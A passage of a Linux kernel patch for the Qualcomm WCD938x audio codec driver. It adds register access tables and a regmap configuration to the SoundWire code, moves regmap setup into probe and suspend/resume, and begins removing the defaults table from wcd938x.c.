++	case WCD938X_TX_COM_SPARE3:
++	case WCD938X_TX_COM_SPARE4:
++	case WCD938X_TX_1_2_TEST_EN:
++	case WCD938X_TX_1_2_ADC_IB:
++	case WCD938X_TX_1_2_ATEST_REFCTL:
++	case WCD938X_TX_1_2_TEST_CTL:
++	case WCD938X_TX_1_2_TEST_BLK_EN1:
++	case WCD938X_TX_1_2_TXFE1_CLKDIV:
++	case WCD938X_TX_3_4_TEST_EN:
++	case WCD938X_TX_3_4_ADC_IB:
++	case WCD938X_TX_3_4_ATEST_REFCTL:
++	case WCD938X_TX_3_4_TEST_CTL:
++	case WCD938X_TX_3_4_TEST_BLK_EN3:
++	case WCD938X_TX_3_4_TXFE3_CLKDIV:
++	case WCD938X_TX_3_4_TEST_BLK_EN2:
++	case WCD938X_TX_3_4_TXFE2_CLKDIV:
++	case WCD938X_TX_3_4_SPARE1:
++	case WCD938X_TX_3_4_TEST_BLK_EN4:
++	case WCD938X_TX_3_4_TXFE4_CLKDIV:
++	case WCD938X_TX_3_4_SPARE2:
++	case WCD938X_CLASSH_MODE_1:
++	case WCD938X_CLASSH_MODE_2:
++	case WCD938X_CLASSH_MODE_3:
++	case WCD938X_CLASSH_CTRL_VCL_1:
++	case WCD938X_CLASSH_CTRL_VCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_1:
++	case WCD938X_CLASSH_CTRL_CCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_3:
++	case WCD938X_CLASSH_CTRL_CCL_4:
++	case WCD938X_CLASSH_CTRL_CCL_5:
++	case WCD938X_CLASSH_BUCK_TMUX_A_D:
++	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
++	case WCD938X_CLASSH_SPARE:
++	case WCD938X_FLYBACK_EN:
++	case WCD938X_FLYBACK_VNEG_CTRL_1:
++	case WCD938X_FLYBACK_VNEG_CTRL_2:
++	case WCD938X_FLYBACK_VNEG_CTRL_3:
++	case WCD938X_FLYBACK_VNEG_CTRL_4:
++	case WCD938X_FLYBACK_VNEG_CTRL_5:
++	case WCD938X_FLYBACK_VNEG_CTRL_6:
++	case WCD938X_FLYBACK_VNEG_CTRL_7:
++	case WCD938X_FLYBACK_VNEG_CTRL_8:
++	case WCD938X_FLYBACK_VNEG_CTRL_9:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
++	case WCD938X_FLYBACK_CTRL_1:
++	case WCD938X_FLYBACK_TEST_CTL:
++	case WCD938X_RX_AUX_SW_CTL:
++	case WCD938X_RX_PA_AUX_IN_CONN:
++	case WCD938X_RX_TIMER_DIV:
++	case WCD938X_RX_OCP_CTL:
++	case WCD938X_RX_OCP_COUNT:
++	case WCD938X_RX_BIAS_EAR_DAC:
++	case WCD938X_RX_BIAS_EAR_AMP:
++	case WCD938X_RX_BIAS_HPH_LDO:
++	case WCD938X_RX_BIAS_HPH_PA:
++	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
++	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
++	case WCD938X_RX_BIAS_HPH_CNP1:
++	case WCD938X_RX_BIAS_HPH_LOWPOWER:
++	case WCD938X_RX_BIAS_AUX_DAC:
++	case WCD938X_RX_BIAS_AUX_AMP:
++	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
++	case WCD938X_RX_BIAS_MISC:
++	case WCD938X_RX_BIAS_BUCK_RST:
++	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_BUFF:
++	case WCD938X_RX_BIAS_FLYB_MID_RST:
++	case WCD938X_HPH_CNP_EN:
++	case WCD938X_HPH_CNP_WG_CTL:
++	case WCD938X_HPH_CNP_WG_TIME:
++	case WCD938X_HPH_OCP_CTL:
++	case WCD938X_HPH_AUTO_CHOP:
++	case WCD938X_HPH_CHOP_CTL:
++	case WCD938X_HPH_PA_CTL1:
++	case WCD938X_HPH_PA_CTL2:
++	case WCD938X_HPH_L_EN:
++	case WCD938X_HPH_L_TEST:
++	case WCD938X_HPH_L_ATEST:
++	case WCD938X_HPH_R_EN:
++	case WCD938X_HPH_R_TEST:
++	case WCD938X_HPH_R_ATEST:
++	case WCD938X_HPH_RDAC_CLK_CTL1:
++	case WCD938X_HPH_RDAC_CLK_CTL2:
++	case WCD938X_HPH_RDAC_LDO_CTL:
++	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
++	case WCD938X_HPH_REFBUFF_UHQA_CTL:
++	case WCD938X_HPH_REFBUFF_LP_CTL:
++	case WCD938X_HPH_L_DAC_CTL:
++	case WCD938X_HPH_R_DAC_CTL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
++	case WCD938X_EAR_EAR_EN_REG:
++	case WCD938X_EAR_EAR_PA_CON:
++	case WCD938X_EAR_EAR_SP_CON:
++	case WCD938X_EAR_EAR_DAC_CON:
++	case WCD938X_EAR_EAR_CNP_FSM_CON:
++	case WCD938X_EAR_TEST_CTL:
++	case WCD938X_ANA_NEW_PAGE_REGISTER:
++	case WCD938X_HPH_NEW_ANA_HPH2:
++	case WCD938X_HPH_NEW_ANA_HPH3:
++	case WCD938X_SLEEP_CTL:
++	case WCD938X_SLEEP_WATCHDOG_CTL:
++	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
++	case WCD938X_MBHC_NEW_CTL_1:
++	case WCD938X_MBHC_NEW_CTL_2:
++	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
++	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
++	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
++	case WCD938X_TX_NEW_AMIC_MUX_CFG:
++	case WCD938X_AUX_AUXPA:
++	case WCD938X_LDORXTX_MODE:
++	case WCD938X_LDORXTX_CONFIG:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
++	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
++	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
++	case WCD938X_HPH_NEW_INT_PA_MISC1:
++	case WCD938X_HPH_NEW_INT_PA_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
++	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
++	case WCD938X_MBHC_NEW_INT_SPARE_2:
++	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
++	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
++	case WCD938X_AUX_INT_EN_REG:
++	case WCD938X_AUX_INT_PA_CTRL:
++	case WCD938X_AUX_INT_SP_CTRL:
++	case WCD938X_AUX_INT_DAC_CTRL:
++	case WCD938X_AUX_INT_CLK_CTRL:
++	case WCD938X_AUX_INT_TEST_CTRL:
++	case WCD938X_AUX_INT_MISC:
++	case WCD938X_LDORXTX_INT_BIAS:
++	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
++	case WCD938X_LDORXTX_INT_TEST0:
++	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
++	case WCD938X_LDORXTX_INT_TEST1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
++	case WCD938X_DIGITAL_PAGE_REGISTER:
++	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
++	case WCD938X_DIGITAL_CDC_RST_CTL:
++	case WCD938X_DIGITAL_TOP_CLK_CFG:
++	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
++	case WCD938X_DIGITAL_SWR_RST_EN:
++	case WCD938X_DIGITAL_CDC_PATH_MODE:
++	case WCD938X_DIGITAL_CDC_RX_RST:
++	case WCD938X_DIGITAL_CDC_RX0_CTL:
++	case WCD938X_DIGITAL_CDC_RX1_CTL:
++	case WCD938X_DIGITAL_CDC_RX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
++	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
++	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
++	case WCD938X_DIGITAL_CDC_SWR_CLH:
++	case WCD938X_DIGITAL_SWR_CLH_BYP:
++	case WCD938X_DIGITAL_CDC_TX0_CTL:
++	case WCD938X_DIGITAL_CDC_TX1_CTL:
++	case WCD938X_DIGITAL_CDC_TX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_RST:
++	case WCD938X_DIGITAL_CDC_REQ_CTL:
++	case WCD938X_DIGITAL_CDC_RST:
++	case WCD938X_DIGITAL_CDC_AMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
++	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
++	case WCD938X_DIGITAL_EFUSE_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
++	case WCD938X_DIGITAL_PDM_WD_CTL0:
++	case WCD938X_DIGITAL_PDM_WD_CTL1:
++	case WCD938X_DIGITAL_PDM_WD_CTL2:
++	case WCD938X_DIGITAL_INTR_MODE:
++	case WCD938X_DIGITAL_INTR_MASK_0:
++	case WCD938X_DIGITAL_INTR_MASK_1:
++	case WCD938X_DIGITAL_INTR_MASK_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_INTR_LEVEL_0:
++	case WCD938X_DIGITAL_INTR_LEVEL_1:
++	case WCD938X_DIGITAL_INTR_LEVEL_2:
++	case WCD938X_DIGITAL_INTR_SET_0:
++	case WCD938X_DIGITAL_INTR_SET_1:
++	case WCD938X_DIGITAL_INTR_SET_2:
++	case WCD938X_DIGITAL_INTR_TEST_0:
++	case WCD938X_DIGITAL_INTR_TEST_1:
++	case WCD938X_DIGITAL_INTR_TEST_2:
++	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
++	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
++	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
++	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
++	case WCD938X_DIGITAL_LOOP_BACK_MODE:
++	case WCD938X_DIGITAL_SWR_DAC_TEST:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
++	case WCD938X_DIGITAL_I2C_CTL:
++	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
++	case WCD938X_DIGITAL_PAD_INP_DIS_0:
++	case WCD938X_DIGITAL_PAD_INP_DIS_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
++	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_GPIO_MODE:
++	case WCD938X_DIGITAL_PIN_CTL_OE:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
++	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
++	case WCD938X_DIGITAL_DIG_DEBUG_EN:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
++	case WCD938X_DIGITAL_SSP_DBG:
++	case WCD938X_DIGITAL_SPARE_0:
++	case WCD938X_DIGITAL_SPARE_1:
++	case WCD938X_DIGITAL_SPARE_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
++		return true;
++	}
++
++	return false;
++}
++
++static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_MBHC_RESULT_1:
++	case WCD938X_ANA_MBHC_RESULT_2:
++	case WCD938X_ANA_MBHC_RESULT_3:
++	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
++	case WCD938X_TX_1_2_SAR2_ERR:
++	case WCD938X_TX_1_2_SAR1_ERR:
++	case WCD938X_TX_3_4_SAR4_ERR:
++	case WCD938X_TX_3_4_SAR3_ERR:
++	case WCD938X_HPH_L_STATUS:
++	case WCD938X_HPH_R_STATUS:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
++	case WCD938X_EAR_STATUS_REG_1:
++	case WCD938X_EAR_STATUS_REG_2:
++	case WCD938X_MBHC_NEW_FSM_STATUS:
++	case WCD938X_MBHC_NEW_ADC_RESULT:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
++	case WCD938X_AUX_INT_STATUS_REG:
++	case WCD938X_LDORXTX_INT_STATUS:
++	case WCD938X_DIGITAL_CHIP_ID0:
++	case WCD938X_DIGITAL_CHIP_ID1:
++	case WCD938X_DIGITAL_CHIP_ID2:
++	case WCD938X_DIGITAL_CHIP_ID3:
++	case WCD938X_DIGITAL_INTR_STATUS_0:
++	case WCD938X_DIGITAL_INTR_STATUS_1:
++	case WCD938X_DIGITAL_INTR_STATUS_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_SWR_HM_TEST_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_1:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
++	case WCD938X_DIGITAL_PIN_STATUS_0:
++	case WCD938X_DIGITAL_PIN_STATUS_1:
++	case WCD938X_DIGITAL_MODE_STATUS_0:
++	case WCD938X_DIGITAL_MODE_STATUS_1:
++	case WCD938X_DIGITAL_EFUSE_REG_0:
++	case WCD938X_DIGITAL_EFUSE_REG_1:
++	case WCD938X_DIGITAL_EFUSE_REG_2:
++	case WCD938X_DIGITAL_EFUSE_REG_3:
++	case WCD938X_DIGITAL_EFUSE_REG_4:
++	case WCD938X_DIGITAL_EFUSE_REG_5:
++	case WCD938X_DIGITAL_EFUSE_REG_6:
++	case WCD938X_DIGITAL_EFUSE_REG_7:
++	case WCD938X_DIGITAL_EFUSE_REG_8:
++	case WCD938X_DIGITAL_EFUSE_REG_9:
++	case WCD938X_DIGITAL_EFUSE_REG_10:
++	case WCD938X_DIGITAL_EFUSE_REG_11:
++	case WCD938X_DIGITAL_EFUSE_REG_12:
++	case WCD938X_DIGITAL_EFUSE_REG_13:
++	case WCD938X_DIGITAL_EFUSE_REG_14:
++	case WCD938X_DIGITAL_EFUSE_REG_15:
++	case WCD938X_DIGITAL_EFUSE_REG_16:
++	case WCD938X_DIGITAL_EFUSE_REG_17:
++	case WCD938X_DIGITAL_EFUSE_REG_18:
++	case WCD938X_DIGITAL_EFUSE_REG_19:
++	case WCD938X_DIGITAL_EFUSE_REG_20:
++	case WCD938X_DIGITAL_EFUSE_REG_21:
++	case WCD938X_DIGITAL_EFUSE_REG_22:
++	case WCD938X_DIGITAL_EFUSE_REG_23:
++	case WCD938X_DIGITAL_EFUSE_REG_24:
++	case WCD938X_DIGITAL_EFUSE_REG_25:
++	case WCD938X_DIGITAL_EFUSE_REG_26:
++	case WCD938X_DIGITAL_EFUSE_REG_27:
++	case WCD938X_DIGITAL_EFUSE_REG_28:
++	case WCD938X_DIGITAL_EFUSE_REG_29:
++	case WCD938X_DIGITAL_EFUSE_REG_30:
++	case WCD938X_DIGITAL_EFUSE_REG_31:
++		return true;
++	}
++	return false;
++}
++
++static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
++{
++	bool ret;
++
++	ret = wcd938x_readonly_register(dev, reg);
++	if (!ret)
++		return wcd938x_rdwr_register(dev, reg);
++
++	return ret;
++}
++
++static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
++{
++	return wcd938x_rdwr_register(dev, reg);
++}
++
++static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
++{
++	if (reg <= WCD938X_BASE_ADDRESS)
++		return false;
++
++	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
++		return true;
++
++	if (wcd938x_readonly_register(dev, reg))
++		return true;
++
++	return false;
++}
++
++static const struct regmap_config wcd938x_regmap_config = {
++	.name = "wcd938x_csr",
++	.reg_bits = 32,
++	.val_bits = 8,
++	.cache_type = REGCACHE_RBTREE,
++	.reg_defaults = wcd938x_defaults,
++	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
++	.max_register = WCD938X_MAX_REGISTER,
++	.readable_reg = wcd938x_readable_register,
++	.writeable_reg = wcd938x_writeable_register,
++	.volatile_reg = wcd938x_volatile_register,
++	.can_multi_write = true,
++};
++
++static const struct sdw_slave_ops wcd9380_slave_ops = {
+ 	.update_status = wcd9380_update_status,
+ 	.interrupt_callback = wcd9380_interrupt_callback,
+ 	.bus_config = wcd9380_bus_config,
+@@ -261,6 +1263,16 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 		wcd->ch_info = &wcd938x_sdw_rx_ch_info[0];
+ 	}
+ 
++	if (wcd->is_tx) {
++		wcd->regmap = devm_regmap_init_sdw(pdev, &wcd938x_regmap_config);
++		if (IS_ERR(wcd->regmap))
++			return dev_err_probe(dev, PTR_ERR(wcd->regmap),
++					     "Regmap init failed\n");
++
++		/* Start in cache-only until device is enumerated */
++		regcache_cache_only(wcd->regmap, true);
++	};
++
+ 	pm_runtime_set_autosuspend_delay(dev, 3000);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_mark_last_busy(dev);
+@@ -278,22 +1290,23 @@ MODULE_DEVICE_TABLE(sdw, wcd9380_slave_id);
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_suspend(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, true);
+-		regcache_mark_dirty(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, true);
++		regcache_mark_dirty(wcd->regmap);
+ 	}
++
+ 	return 0;
+ }
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_resume(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, false);
+-		regcache_sync(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, false);
++		regcache_sync(wcd->regmap);
+ 	}
+ 
+ 	pm_runtime_mark_last_busy(dev);
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index aca06a4026f3e..1d801a7b1469d 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -273,1001 +273,6 @@ static struct wcd_mbhc_field wcd_mbhc_fields[WCD_MBHC_REG_FUNC_MAX] = {
+ 	WCD_MBHC_FIELD(WCD_MBHC_ELECT_ISRC_EN, WCD938X_ANA_MBHC_ZDET, 0x02),
+ };
+ 
+-static const struct reg_default wcd938x_defaults[] = {
+-	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
+-	{WCD938X_ANA_BIAS,                                     0x00},
+-	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
+-	{WCD938X_ANA_HPH,                                      0x0C},
+-	{WCD938X_ANA_EAR,                                      0x00},
+-	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
+-	{WCD938X_ANA_TX_CH1,                                   0x20},
+-	{WCD938X_ANA_TX_CH2,                                   0x00},
+-	{WCD938X_ANA_TX_CH3,                                   0x20},
+-	{WCD938X_ANA_TX_CH4,                                   0x00},
+-	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
+-	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
+-	{WCD938X_ANA_MBHC_MECH,                                0x39},
+-	{WCD938X_ANA_MBHC_ELECT,                               0x08},
+-	{WCD938X_ANA_MBHC_ZDET,                                0x00},
+-	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
+-	{WCD938X_ANA_MBHC_BTN0,                                0x00},
+-	{WCD938X_ANA_MBHC_BTN1,                                0x10},
+-	{WCD938X_ANA_MBHC_BTN2,                                0x20},
+-	{WCD938X_ANA_MBHC_BTN3,                                0x30},
+-	{WCD938X_ANA_MBHC_BTN4,                                0x40},
+-	{WCD938X_ANA_MBHC_BTN5,                                0x50},
+-	{WCD938X_ANA_MBHC_BTN6,                                0x60},
+-	{WCD938X_ANA_MBHC_BTN7,                                0x70},
+-	{WCD938X_ANA_MICB1,                                    0x10},
+-	{WCD938X_ANA_MICB2,                                    0x10},
